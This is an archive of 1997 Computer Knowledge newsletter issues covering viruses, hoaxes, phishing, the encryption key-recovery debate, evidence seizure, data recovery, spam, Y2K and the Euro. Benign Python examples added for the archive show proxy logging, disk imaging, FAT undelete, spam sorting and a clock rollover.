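    origin = OriginSite({"/news": "<html>today's headlines</html>",
                         "/banned": "<html>page the proxy operator dislikes</html>"})
    proxy = CachingProxy(origin, address="proxy.example.net", blocked={"/banned"})
    user = "198.51.100.7"             # constructed user address (documentation range)
    proxy.get("/news", user)          # first visit: proxy fetches it from the origin
    proxy.get("/news", user)          # second visit: served from the proxy's cache
    proxy.get("/banned", user)        # never reaches the origin at all
    return origin.access_log, proxy.request_log


if __name__ == "__main__":
    origin_log, proxy_log = demo()
    print("origin saw:", origin_log)
    print("proxy saw: ", proxy_log)
```

The origin's log ends up with a single entry naming the proxy, while the proxy's log holds the user's address against every URL, including the one it refused to fetch. Whether that second log is ever kept or sold is exactly the trust decision the paragraph above leaves to you.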

General Security

The web has much information and many sites. We’ve discussed some protection techniques in past issues but there is one technique that only you can apply, and technology can’t help you. That technique is use of common sense and critical analysis.

There are many web sites you will encounter that purport to give you the whole truth and, for all intents and purposes, look very much like they do. But looks are not sufficient. Just because a site looks like it has valid and useful information does not necessarily mean it does. It’s important to know the source of the information. It’s also important to validate the information as correct.

One example of the type of site where you might want to question what you see would be one of the so-called “hate group” sites (we’re not going to reference any specific site but they are easy to find). These sites present their case in strong terms that often sound reasonable. But, they often share features, no matter who might be the hate target:

  • Paranoia seems to be a main theme. Look for the word “conspiracy.”
  • Often God or religion is cited as justification for whatever is being put forth as truth. (Don’t get me wrong, religion should be an important part of life, but we’ve all seen throughout history how it can be used to justify some fairly nasty things.)
  • Many times some sort of social or economic collapse is predicted. Of course, the target of the hate group will be the cause of the collapse.

Not all sites with bad information will be so obvious. I’ve come upon a number of sites that claim to have virus information and present brief tutorials or articles. Some of these are accurate but most have one or more errors that could get you into trouble. One, for example, indicated that to recover from a virus attack the best thing to do is format your hard disk and restore from backup. While necessary for a very few viruses, it is rare that you have to do this. Taking such advice can lead you to unnecessary work at best and actually do damage at worst.

Bottom line: Use common sense and validate information before trusting anything you find on the web (I’ll add that this goes for books in the library and news from the media as well!).

For an interesting paper on this topic go to the Virus Myths site and look for the paper on False Authority Syndrome. Check at: http://www.kumite.com/myths/ [Reproduced with permission in the CKnow Virus Tutorial]

Another technique being advertised as protection for the user is something called digital certificates. Individuals and companies apply to a central source for a certificate and, when issued, the certificate is supposed to make certain whatever you accept that’s signed is from the person to whom the certificate is issued.

It works, but to put it bluntly, so what? You know the item came from a particular person but that gives you no idea about the security of that item. In short, the certificate doesn’t tell you anything about the person except that s/he presented some sort of identification to the issuing authority. It doesn’t answer the question you want answered: “Can I trust this person with my credit card info (or medical records, or whatever)?”

Look for an eventual move away from certificates identifying a person or company and a move toward certification of types of transactions (i.e., the certificate will guarantee the safety of a particular transaction no matter who is involved in that transaction). The method is still not decided, but the move toward transaction certification and decentralization of the process is already underway in concept.

In closing: Safe computing to everyone.

Computer Knowledge Newsletter – August 1997 Issue

In This Issue:

Virus News

No major virus alerts or hoaxes reported this past month. Some will worry about the Hare virus in September, but it will be mostly hype. One expert says that your chance of seeing the Hare virus is about as good as winning a state lottery with one ticket. Just use any good anti-virus program and ignore the hype.

General Security

You are going to start hearing a lot about technology called “push” if you have not already. Push is supposed to make the internet easier for you by feeding you content based on your desires. This saves you the need to go out and find the news; it will come to you. Just fill out a profile and sit back. PointCast was one of the first push sites and now contains a number of channels you can subscribe to (it’s much like TV). The newest updates of the big two browsers will have push technology built into them, and both Netscape and Microsoft have contracted with multiple providers.

Push isn’t bad. The main problem is that it isn’t any sort of standard. Indeed, most push techniques are hacks of current limited HTML technology with all its flaws. JavaScript and other techniques are used to basically request periodic updates from the server providing the feed. So, basically, in order to receive push material you have to activate those features on your browser–and it’s those features that still have security problems. Keep that in mind when you consider a push source.

Are you the manager of a small or mid-sized network? Secure Computing reports that many companies with small and medium-sized networks “have yet to implement network security solutions.” And, many of these networks are connected to the internet, making them extremely vulnerable. The problem is that most of these networks are managed by non-professional staff and the original defaults installed by the maker of the network software have rarely been changed. Further, security upgrades are often either ignored or not even known about. Two thirds of these networks don’t use any kind of firewall. If you fall into this category, you might want to consider taking another look at your network security.

And, to show you that even the whole internet is vulnerable to rather simple problems, at 2:30am (Eastern) on 17 July an operator keyboard error created a partial blackout of the entire internet, some of which lasted up to 36 hours. Mail was interrupted; some even lost. The problem started when a Network Solutions operator released improperly formatted internet lookup tables for the .COM and .NET domains. While found relatively soon, the bad table had propagated across the internet and the problem could not be resolved until a new table with correct information also propagated across the internet to replace the bad one. At the height of the problem something like 40% of the E-mail bounced or simply went into the bit bucket, never to be seen again. The day before, a major fiber cable was cut in Los Angeles and a major power outage took down much of the MAE West internet exchange point for a short time; both caused slow (or no) access for a period. Mid-July was not a good time for the internet.

Yet another bug related to Java and Microsoft has reared its head. Java is supposed to establish a “sandbox” for running applets downloaded from web sites (the sandbox metaphor is used because applets can do what they want within the box but not get outside of it). Apparently, there is a bug in the Microsoft Java Virtual Machines for Windows 3.1, Windows 95, and NT. Under special conditions it seems that a Java applet running in Internet Explorer could access a different internet connection than the one the applet came from and write to your local hard disk (a no-no under Java rules). Microsoft acknowledges the problem but says it only occurs with image files. Other researchers are not so certain. While Microsoft sorts things out, standard caveats apply: turn off all the extra stuff unless you are specifically at a site you know you can trust.

Several newspapers report that subscribers of America Online recently received E-mail apparently from AOL’s chief of Member Services, entitled “Important AOL Information.” The letter is supposed to have given an update on AOL’s efforts to improve its service. At the end was a URL to a letter from AOL Chairman Steve Case, in which readers were asked to give their name, address, home phone, and credit-card number to update AOL’s new computers. As you might expect the link went to a cracker’s database. Bottom line: NEVER give your credit card number (or other important information) to anyone who asks for it if you have not initiated the call or link.

General Information

Last month we talked a bit about hate groups. Early this month, in Germany, a law banning neo-Nazi information and sexually explicit information went into effect. The law penalizes any organization making such material available and any provider that allows it to exist on their system or pass through their system, even if the material originated outside of Germany. It should be interesting to watch this progress.

Year 2000 problems continue to make the news, but as a sign of things to come C|Net has reported that the first lawsuit over problems caused by software not working beyond 1999 has been filed: “Mark Yarsike and Sam Katz, owners of Produce Palace International in Warren, Michigan, said they are tired of losing business due to the problem, and have filed a lawsuit against cash register maker Tec-America and its local service vendor, All American Cash Register Incorporated, seeking $10,000, plus damages, interest, costs, and attorney’s fees. The problem, according to Yarsike and Katz, is that their cash registers cannot recognize the year 2000 as a valid credit card expiration date. They said that between April 30, 1996 and May 6, 1997 their registers crashed 105 times when they attempted to ring up sales billed to credit cards expiring in 2000.”

The credit reporting bureau Experian (formerly TRW Information Systems & Services) started an experiment in selling credit reports over the web. For a fee plus enough private information to identify you the company was willing to make your credit report available to you over a secure internet connection. But, when Experian employees (mostly) started to access the system they suddenly started to get other people’s credit reports. Needless to say, the site was shut down the next day. (Other, less public agencies have been selling such reports over the web and continue to do so.)

Computer Knowledge Newsletter – September 1997 Issue

In This Issue:

Virus News

Two different viruses have started to circulate. So far neither appears to have spread far, but be certain your anti-virus software is up-to-date and able to find these.

Spanska.4250

Dr. Solomon’s (http://www.drsolomon.com) reports that Spanska.4250 is a memory resident polymorphic virus, infecting COM and EXE files. The virus uses stealth to conceal the increase in size of infected files. Some EXE programs fail to run when infected.

If a program infected with Spanska.4250 is run within the first 16 seconds of the 30th minute of any hour (using the system clock) the virus triggers. It displays one of a set of animated text messages, dedicated to a girl named Elvira.

This is one of a number of Spanska variants, but it is the only variant which goes memory resident.

Baboon

Dr. Solomon’s (http://www.drsolomon.com) reports that Baboon is a pure boot sector virus which infects the boot sector of floppy disks and the partition sector MBR (Master Boot Record) of hard disks. The virus is caught by booting, or attempting to boot, off an infected floppy disk. It then installs itself in the partition sector.

The Baboon virus has a payload which triggers on the 11th September. On this date the virus overwrites the hard disk MBR (Master Boot Record) and the first 9 sectors of the active (bootable) partition. As well as triggering on the 11th of September the virus can also trigger randomly (albeit infrequently) upon bootup.

To help prevent future infections by pure boot sector viruses Computer Knowledge recommends companies change the CMOS settings of their PCs so they boot from drive C: rather than drive A: by default. This is done using the Setup utility in the BIOS.

General Security

Have you looked around and watched what has been happening on the personal and business security front, particularly with regard to encryption and its availability? If not, you should. Jim Bidzos, President of RSA Data Security, Inc., has prepared an information paper on the bill currently in front of Congress. It’s presented in total below. Remember that RSA sells security products, but this does not necessarily void the points made in the article. The availability of secure encryption is something that everyone should be concerned about. (More information on the subject, including a “Frequently Asked Questions about Cryptography” primer, as well as free personal encryption software with no government access, can be found at www.rsa.com.)

The Encryption Debate: Too Much at Stake to Rush to Legislation

Recently, the debate over encryption has intensified. FBI Director Louis Freeh, in his September 3rd testimony before a subcommittee of the Senate Judiciary Committee, sought legislation that would require “key recovery” techniques in all encryption products made and used in the US. The proposed legislation discussed at the hearing, S909, the McCain-Kerry bill, would require that all encryption products manufactured, sold, or used in the US provide on-demand government access with a properly authorized court order.

No one wants to see the FBI stymied in its efforts to do its public safety job. But unfortunately, the debate in the Senate seems to suggest that those opposed to S909 are ignorant of national security concerns, or, worse, willing to put national security at risk for commercial interests. This situation may cause lawmakers to overlook the important issues currently missing from the debate: a clear picture of the potential implications of the legislation the FBI seeks, and identification of safeguards against abuse of a key recovery system.

This debate centers around the use and export of strong encryption (currently, US companies may not freely export products with strong encryption) for use by businesses and individuals to ensure privacy and confidentiality of information in a digital world. Strong encryption is essential in order to conduct business securely and to guard against many forms of espionage, attacks, computer break-ins and theft of information. Strong encryption prevents crime.

However, the same encryption is also seen as a threat to law enforcement and national security concerns. They see it hindering, and possibly preventing them from successfully safeguarding the public from criminals who will use encryption to conceal their activities.

Inside the US, advanced, strong, unescrowed encryption is in use in tens of millions of products, including every browser sold by Netscape and Microsoft, and numerous other products. The international community quickly moved to adopt and deploy encryption, with companies springing up in Germany, South Africa, Ireland, Belgium, Switzerland, and Singapore to exploit opportunities created by US export policy.

Criticism of S909 comes from three groups. First, from privacy advocates and technologists who fear an unmanageable key recovery system that would invite abuse from within and outside the government, and significantly weaken the infrastructure on which we all will depend. The second group is the computer industry, which fears that a law requiring products to include US government access will make them unable to compete in a world where roughly 60% of their revenues come from outside the US, where their foreign competitors are not so bound. Third, US companies operating internationally are concerned that foreign governments with key recovery – we assume no foreign government will let the US government hold the keys – will use it to steal intellectual property or other valuable business secrets and pass it on to their own industry. (Using government intelligence to help state-owned industries win business from US companies is a well-established practice in France and elsewhere.) Let’s take a closer look at the first two arguments.

In the cyber society we are rapidly moving towards, everything about us will be stored digitally. Contrary to assertions by the FBI (which says it only wants to maintain wiretap capabilities as they have existed since 1968), the proposal for key recovery is not the digital equivalent of putting alligator clips on phone wires. It is more like giving the government the keys to our entire personal and professional lives. Keys that are difficult to control and track. And while the FBI says that access will only be by authorized court order, they have not addressed how controls and audit will prevent abuse in the form of non-intrusive, surreptitious use of these valuable keys. The far-reaching implications of such an unprecedented government capability must be analyzed and debated further for the protection of all. Would you allow local and federal law enforcement to have and store a copy of the key to your home and your filing cabinets? It is interesting to note that the encryption issue is a rare case where both the National Rifle Association and the Civil Liberties Union are on the same side, opposed to any law that restricts an individual’s use of encryption.

Industry has legitimate and serious concerns about the effect S909 will have on their ability to compete in a global marketplace. The FBI’s plan is to require key recovery in products built, sold, or used in the US. Clearly, their hope is that the US market, thus regulated, will sway the international market. But if other countries – as Germany already has – choose not to control the export of encryption or require key recovery, how will US industry compete? Even Director Freeh admits that given a choice of government key recovery and non-government key recovery products, corporations and individuals will choose the latter. Having failed in its attempts to gain international consensus on key recovery, the administration must, as must the Congress, accept this threat to our dominance of the high-tech industry as reality. The threat is simply that US competitiveness will become a casualty of the crypto-wars, as we struggle to comply with a law no one fully understands, and foreign suppliers step in to meet the demand. With hundreds of thousands of important, well-paying jobs in an industry we currently lead at stake, economic well-being must be considered more carefully as part of the national security formula.

The chorus of voices supporting an end to government control of encryption has grown in recent years. It includes millions of individuals, most of industry; numerous industry groups including the Software Publisher’s Association and the Business Software Alliance; a majority of the US House of Representatives (1); a Federal Judge (2), and the California Legislature (3). These are organizations and people who have studied this problem closely. Their position is supported by numerous studies, including one done by the National Research Council, which urges relaxation of export controls and a “go slow” policy on key recovery, which it called unproved.

(1) More than half of the members of the House are co-sponsors of the SAFE bill – Security and Freedom Through Encryption – HR695, authored by Rep. Bob Goodlatte, D-Va., which would prohibit domestic US government controls on encryption. However, during the week of September 8, the House Intelligence Committee modified the SAFE Bill to look more like McCain-Kerry. [CK: The bill passed out of committee back in its original form.]

(2) On August 26, 1997, the Hon. Marilyn Hall Patel ruled against export control of encryption, saying in part “the encryption regulations are an unconstitutional prior restraint in violation of the First Amendment.”

(3) California Senate Joint Resolution 29 gained final passage September 5, 1997, when the state Assembly passed, by a vote of 79-0, a resolution calling for the enactment of the SAFE bill.

There is a fourth group that should be interested, but seems not to be. That is the Congress itself. Will Congress (and the Judicial Branch as well) be exempt, and be able to purchase non-key-recovery products? Or will the Attorney General and FBI Director have access to all their most sensitive communications?

With so much at stake, we can only hope that the Senate will be willing to look more closely at and hear more voices on this critical issue before turning S909 into law. If you have an opinion on this issue, your representatives in Congress should hear from you. It’s the only vote you’ll get.

Without trying to sound paranoid, if you consider this debate academic, please think again. The initial reaction is “I’ve got nothing to hide; I don’t do anything wrong.” That may be true, but take a second look at who you are entrusting that data to. Look closely at who had access to what at the White House in recent years and how that information was (mis)used. Then, ask yourself if you or your business can afford to be compromised by these same folks. Insight Magazine reports that the current court that judges the validity of secret taps of the kind required to get at a backdoor in a security program has yet to turn down a request (and, oh yes, this court meets in secret!).

General Information

Let’s all hope that none of the gentle readers of this newsletter will run afoul of the law, but if you happen to and your computer is involved, here are some of the things you might expect to happen in the name of gathering evidence.

  • Law enforcement will assume the worst; in the case of computers this means that they assume you have installed a simple way to erase all data from storage. Therefore, if you are at your computer the first thing they will do is find a way to remove you from the area of the computer.
  • Next they will shut the system down. For standalone computers this will likely mean unplugging the computer. For networked devices they will probably command an ordered shutdown (largely because network servers tend to keep lots of information in memory cache and an ordered shutdown will write this out to disk). The concern is to preserve evidence and prevent any automatic processes from erasing information. Individual situations may vary.
  • Next, they will likely gather as much of the hardware and software as they can find and cart it off to another location to work on it. It’s important that you realize this because even if you are innocent and there is no data of interest to them on your computer, you will still not have access to any part of it until the evidence gathering process is complete; and even then if the investigator is not particularly competent or careful the gathering process may damage data. (The very careful [or very paranoid] among you might conclude from this that having an off-site backup stored where nobody else knows where it is might be a good thing.)
  • During evidence gathering you can expect authorities to first make a bit-stream backup of everything. The image backup is necessary in case you have installed traps in the computer software, they activate, and the computer must be returned to its original state for another try at getting to your data. This process might be made harder if you happen to encrypt your data (and do NOT store a written copy of the password anywhere near the computer!). The encryption threat is one reason why the government has suddenly turned the spotlight on it (see related article in the General Security section of this newsletter).
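The bit-stream image in the last step is worth seeing in code, because it is also the habit that protects you as the owner: a byte-for-byte copy whose hash is recorded before anyone touches the original, so that a later restore can be proven identical. The Python below is an added example for this archive, not a tool the investigators would use; it images a constructed “disk” file, hashes source and image, changes the original (standing in for a trap firing), and restores it from the image.

```python
import hashlib
import os
import tempfile

BLOCK = 4096   # copy and hash in fixed-size blocks, the way dd-style tools do


def sha256_of(path):
    """Hash a whole file in blocks; the digest is the image's fingerprint."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK), b""):
            h.update(chunk)
    return h.hexdigest()


def image_device(source, image):
    """Bit-stream copy: every byte in order, including space no live file claims.
    Returns the digests of both sides so they can be compared and recorded."""
    with open(source, "rb") as src, open(image, "wb") as dst:
        for chunk in iter(lambda: src.read(BLOCK), b""):
            dst.write(chunk)
    return {"source": sha256_of(source), "image": sha256_of(image)}


def restore_device(image, target):
    """Put the device back exactly as imaged; returns the digest of the result."""
    with open(image, "rb") as src, open(target, "wb") as dst:
        for chunk in iter(lambda: src.read(BLOCK), b""):
            dst.write(chunk)
    return sha256_of(target)


def demo():
    """Image, disturb, restore; the three digests must agree for the restore to be trusted."""
    with tempfile.TemporaryDirectory() as workdir:
        device = os.path.join(workdir, "disk.bin")      # constructed stand-in for a drive
        image = os.path.join(workdir, "disk.img")
        # Constructed contents: boot area, a live file, then bytes a deleted file left behind.
        contents = (b"BOOT" + b"live file data" + b"\x00" * 100
                    + b"leftover of a deleted file" + b"\x00" * 10000)
        with open(device, "wb") as f:
            f.write(contents)
        digests = image_device(device, image)
        with open(device, "ab") as f:               # the original changes after imaging
            f.write(b"trap fired, disk altered")
        restored = restore_device(image, device)
        return digests, restored


if __name__ == "__main__":
    digests, restored = demo()
    print("source:", digests["source"])
    print("image: ", digests["image"])
    print("after restore:", restored)
```

Keeping the recorded digest with your off-site inventory lets you check, when equipment comes back, whether the drive you receive is the drive that left.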

To protect yourself in these circumstances, you need to keep a complete inventory of your computer hardware/software stored in an off-site location (this is a good general practice; it also helps if your equipment is stolen). Compare this list with the receipt you get for equipment taken and again with equipment returned after any investigation. If possible, supervise the process of gathering your hardware/software and take your own notes saying what happened and what is being taken (it’s unlikely you’ll be allowed to do this, but try anyhow). Finally, make certain that the investigators take precautions that protect your data (assuming you have nothing to hide). For example, most patrol cars have a powerful radio in the trunk. Point out to the investigators how the emissions from such a device can damage data stored in a computer and that they should avoid setting the computer on top of the radio.

Nobody likes to become involved with the law in a criminal investigation, but now and again it could happen, even by accident, and if your computer is involved you may not see it again for awhile (and when you do see it there is no guarantee any of your data will still be available and in good form). It’s important that you try to find a way of minimizing the damage to your business should the worst happen.

Computer Knowledge Newsletter – October 1997 Issue

In This Issue:

Virus News

AOL Cookie Rumor. If you have not heard it yet, you probably will soon: a rumor is moving through the net that purports to come from an AOL software developer saying he’s discovered a new “cookie” in the next version of the AOL software. This cookie is supposed to search through your hard disk and report the findings back to the company for some nefarious purpose.

It’s a hoax. As with all such hoaxes the main theme is built around technobabble and adds detail well beyond what would be necessary for a real warning (this one even goes into personal detail about the person supposedly doing the analysis).

General Security

Data Recovery. Your data has been called for in court and you really don’t want it seen in court so you erase the disk. Are you safe? Don’t bet on it.

Ignoring the fact that you’ve just committed an illegal act (destroying evidence) the fact that data are written to a disk as binary bits on magnetic media means it is often possible to recover the data by analysis of the media.

At its simplest, when you erase a file only the directory pointer to the file is erased along with the first element in the file allocation table being marked available so future disk writes can use the space. The data remains on the disk. So, if you just erased the file using the DEL command then you really have not deleted the file; just pointers to it. At this stage the data can frequently be recovered using fairly simple tools you can purchase at any software store.

If, after deleting the file, you attempt to overwrite the data it still may be able to be recovered using sophisticated analysis techniques. Ontrack Data International, Inc. has performed disk analysis in a number of court cases and recovered enough data to obtain convictions. A company was accused of using sexually explicit games on office PCs and deleted the programs after being accused. Ontrack found traces of the files and the company lost. In an embezzlement case Ontrack found files an employee deleted after being told not to. They have also stopped a software piracy ring which used a company’s server for distribution.
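The simple case in the two paragraphs above (DEL removes the pointers, not the data, and only a later overwrite takes the data away) can be shown with a toy FAT-style volume. The Python below is an added example for this archive, not a real file system or any vendor’s recovery tool: cluster size, file names and contents are constructed, the directory and FAT are simplified, and the magnetic-media analysis that recovers overwritten data is not modelled.

```python
CLUSTER = 16            # bytes per cluster (constructed, tiny so the layout is visible)
FREE, END = 0, 0xFFF    # FAT markers: unallocated cluster / last cluster of a chain


class ToyFatVolume:
    """Toy FAT-style volume: a FAT, a directory table and a raw cluster area."""

    def __init__(self, clusters=16):
        self.fat = [FREE] * clusters
        self.data = bytearray(clusters * CLUSTER)
        self.directory = []      # entries: {"name", "first", "size", "deleted"}

    def _span(self, cluster):
        return slice(cluster * CLUSTER, (cluster + 1) * CLUSTER)

    def write_file(self, name, content):
        needed = max(1, -(-len(content) // CLUSTER))        # ceiling division
        free = [i for i, v in enumerate(self.fat) if v == FREE]
        if len(free) < needed:
            raise OSError("volume full")
        chain = free[:needed]
        for n, c in enumerate(chain):
            chunk = content[n * CLUSTER:(n + 1) * CLUSTER]
            self.data[c * CLUSTER:c * CLUSTER + len(chunk)] = chunk
            self.fat[c] = chain[n + 1] if n + 1 < len(chain) else END
        self.directory.append({"name": name, "first": chain[0],
                               "size": len(content), "deleted": False})

    def read_file(self, name):
        entry = next(e for e in self.directory if e["name"] == name and not e["deleted"])
        out, c = bytearray(), entry["first"]
        while True:                                           # follow the FAT chain
            out += self.data[self._span(c)]
            if self.fat[c] == END:
                break
            c = self.fat[c]
        return bytes(out[:entry["size"]])

    def delete(self, name):
        """DEL-style delete: mark the entry, free the chain, leave every data byte alone."""
        entry = next(e for e in self.directory if e["name"] == name and not e["deleted"])
        entry["deleted"] = True
        entry["name"] = "?" + entry["name"][1:]   # stands in for FAT's 0xE5 first-byte mark
        c = entry["first"]
        while c != END:
            nxt = self.fat[c]
            self.fat[c] = FREE
            c = nxt

    def undelete(self, marked_name):
        """What a store-bought undelete tool does: trust the marked entry's first cluster
        and size and assume the clusters were contiguous (the FAT chain is gone)."""
        entry = next(e for e in self.directory if e["name"] == marked_name and e["deleted"])
        start = entry["first"] * CLUSTER
        return bytes(self.data[start:start + entry["size"]])

    def wipe_free_clusters(self, fill=b"\x00"):
        """Overwrite every cluster the FAT calls free; only now is the simple path closed."""
        for i, v in enumerate(self.fat):
            if v == FREE:
                self.data[self._span(i)] = fill * CLUSTER


def demo():
    """Write, delete, undelete; then wipe and try again. Returns both recovery results."""
    vol = ToyFatVolume()
    secret = b"SECRET: the memo we wish we had never written."   # constructed sample
    vol.write_file("MEMO.TXT", secret)
    vol.delete("MEMO.TXT")
    after_delete = vol.undelete("?EMO.TXT")    # intact: DEL touched only the pointers
    vol.wipe_free_clusters()
    after_wipe = vol.undelete("?EMO.TXT")      # zeros: the clusters were overwritten
    return after_delete, after_wipe


if __name__ == "__main__":
    recovered, wiped = demo()
    print("after DEL: ", recovered)
    print("after wipe:", wiped)
```

The undelete works precisely because nothing but bookkeeping changed. Overwriting the free clusters defeats this simple tool, but as the paragraph on Ontrack notes, it does not defeat laboratory analysis of the media itself.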

Data recovery is becoming big business. [Note: This article was written Saturday, 11 Oct and C|Net, in the show I watched on the following day, did extensive coverage on this subject; mentioning Ontrack and showing their labs.]

Netscape. If you have downloaded an early version of Netscape’s new Communicator browser or suite you might want to update to the latest version. Early versions have some bugs in the JavaScript implementation. One of these creates an opportunity for a malicious web designer to install a “tracker” applet in the form of an invisible window that steals information from your main window and sends it back to the malicious site. The latest upgrade is supposed to fix this problem.

Encryption. The SAFE bill described in the last newsletter safely made it out of the House Commerce Committee without the Oxley/Manton amendment which would have effectively gutted the safety of encryption. But, you can be certain that will not be the last time the encryption backdoor issue surfaces. Keep a close watch.

General Information

Spam. We all get spam (unwanted advertising E-mail in this case). What should you do about it? Generally, you should just try to build E-mail filters and hit the delete key for those messages that make it through the filters.

But, you say, most of the spam messages have some sort of remove mechanism. Why not just use it? Basically, because the remove instructions generally don’t work. They are either fake addresses or addresses that actually collect information. Stop to think for a moment: what’s the best way to validate a list of addresses? Of course, you get responses from those addresses. So, when you respond to spam, even a negative response, you’ve validated the fact that your address is, in fact, active. That’s a goldmine for marketers.

In a related way, it would appear that marketers now have yet another way to validate E-mail addresses. They send what appear to be personal notes hoping you will respond in some way. The notes are usually just innocuous and from reasonable-sounding addresses (but, of course, not addresses you recognize). It’s really easy to get caught up in messages like that and jot down a quick response and send it off. Be a bit more careful. If you don’t recognize the address and/or the message is not signed by someone you know just ignore it. If it is someone you know they’ll get back to you with a more detailed message you will recognize. When you then respond, refer them to this newsletter as an excuse if you need to.
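The advice in the two paragraphs above (filter, delete, and never answer a stranger’s “remove” hook or a too-casual note) can be turned into a small rule-based sorter. The Python below is an added example for this archive, not any mail program’s filter; the correspondent list, the lure phrases and the three sample messages are all constructed.

```python
import email
import email.utils

# Constructed allowlist: people whose mail goes straight to the inbox.
KNOWN_CORRESPONDENTS = {"alice@example.org", "newsletter@cknow.example"}
# Phrases typical of the "remove mechanism" lure (constructed list).
REMOVE_LURES = ("to be removed", "remove me", "reply with remove", "unsubscribe")


def classify(raw_message):
    """Return the folder for one RFC 822-style message: 'inbox', 'spam' or 'hold'."""
    msg = email.message_from_string(raw_message)
    sender = email.utils.parseaddr(msg.get("From", ""))[1].lower()
    body = msg.get_payload() if not msg.is_multipart() else ""
    text = (msg.get("Subject", "") + "\n" + body).lower()
    if sender in KNOWN_CORRESPONDENTS:
        return "inbox"
    if any(lure in text for lure in REMOVE_LURES):
        return "spam"      # unsolicited, with a 'remove' hook: delete it, never reply
    return "hold"          # unknown sender, looks personal: wait for a real follow-up


# Constructed sample messages, not real mail.
SAMPLES = {
    "friend": "From: Alice <alice@example.org>\nSubject: lunch?\n\nStill on for Friday?\n",
    "spam": ("From: deals@bulkmail.example\nSubject: MAKE MONEY FAST\n\n"
             "Earn $$$ from home! To be removed from this list, reply with REMOVE.\n"),
    "stranger": ("From: pat@unknown.example\nSubject: hey\n\n"
                 "Long time no talk! Drop me a line when you get this.\n"),
}


def sort_mail(samples=SAMPLES):
    """Run every sample through the rules; returns name -> folder."""
    return {name: classify(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, folder in sort_mail().items():
        print(f"{name:9s} -> {folder}")
```

The “hold” folder is the point: a note from an unrecognised address is neither answered nor trusted until the sender proves to be someone you know.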

Early Year 2000 Problem. Do you run Mentor Graphics on a Hewlett-Packard Apollo Domain workstation? If so beware. At exactly 14:59 Greenwich Mean Time on November 2nd the real-time clock will increment so that the 32nd bit is set. Some computer operations treat this bit as a negative number indicator which will place the file system at risk for date operations that treat the number in this way. Mentor says only a small number of people are at risk (the system is old); but if you are one of those check with Mentor for fixes to the problem. (HP is supposed to have a patch available but Mentor is reported to say that patch does not apply to early versions of the software. Check if you are not absolutely certain.)
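To see why a set 32nd bit turns a clock negative, here is an added worked example in Python; it is not from the newsletter or from Mentor or HP. It assumes a 48-bit counter of 4-microsecond ticks starting at 1 January 1980 UTC, whose upper 32 bits are what date code compares; that tick size and epoch are my assumption, not stated above, but they reproduce the 14:59 GMT, 2 November instant the item reports, which is why they are used here.

```python
from datetime import datetime, timedelta, timezone

TICK_US = 4                                             # assumed tick: 4 microseconds
EPOCH = datetime(1980, 1, 1, tzinfo=timezone.utc)       # assumed epoch
HIGH_WORD_SHIFT = 16                                    # upper 32 of 48 bits hold the "date" part


def high_word(ticks):
    """The 32-bit value date code sees: the top 32 bits of the 48-bit counter."""
    return (ticks >> HIGH_WORD_SHIFT) & 0xFFFFFFFF


def as_signed32(word):
    """Interpret a 32-bit word as two's-complement, as a signed compare would."""
    word &= 0xFFFFFFFF
    return word - (1 << 32) if word & 0x80000000 else word


def rollover_instant():
    """The moment the counter reaches 2**47, i.e. the high word's bit 31 first sets."""
    return EPOCH + timedelta(microseconds=(1 << 47) * TICK_US)


def demo():
    """High word just before and just after the rollover, seen unsigned and signed."""
    before, after = (1 << 47) - 1, 1 << 47
    return {
        "before_unsigned": high_word(before), "before_signed": as_signed32(high_word(before)),
        "after_unsigned": high_word(after), "after_signed": as_signed32(high_word(after)),
        "when": rollover_instant(),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:16s} {v}")
```

Read as unsigned, the high word simply steps from 2147483647 to 2147483648; read as signed, it steps to -2147483648, a date far in the past, and every comparison that treats the word as signed answers wrongly from that tick on.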

The Euro. With year 2000 (Y2K) problems making most of the news you may not have noticed that another worldwide computer problem is on the horizon a year sooner. Current plans call for the European Community to introduce a single currency unit, the Euro, on 1 January 1999. Physical currency will remain as it is for three more years (when Euro money will then replace the 13 billion notes and 76 billion coins in circulation). But, everything financial other than the notes will change at the start of 1999.

Not generally understood by the public, the Euro problem could be in some ways worse than the Y2K problem. With Y2K one has to fix code that already exists to add support for four-digit years. The basic logic remains the same. The Euro problem requires additional modules to perform currency conversions. Adding modules to legacy code can be a serious problem, and for those systems affected the cost of the change could actually be more than fixing the Y2K problem. There are far more concerns than just adding another currency conversion to your software (e.g., statistical analysis in a currency with no historical database behind it).

And, you have a year less time to work on this one!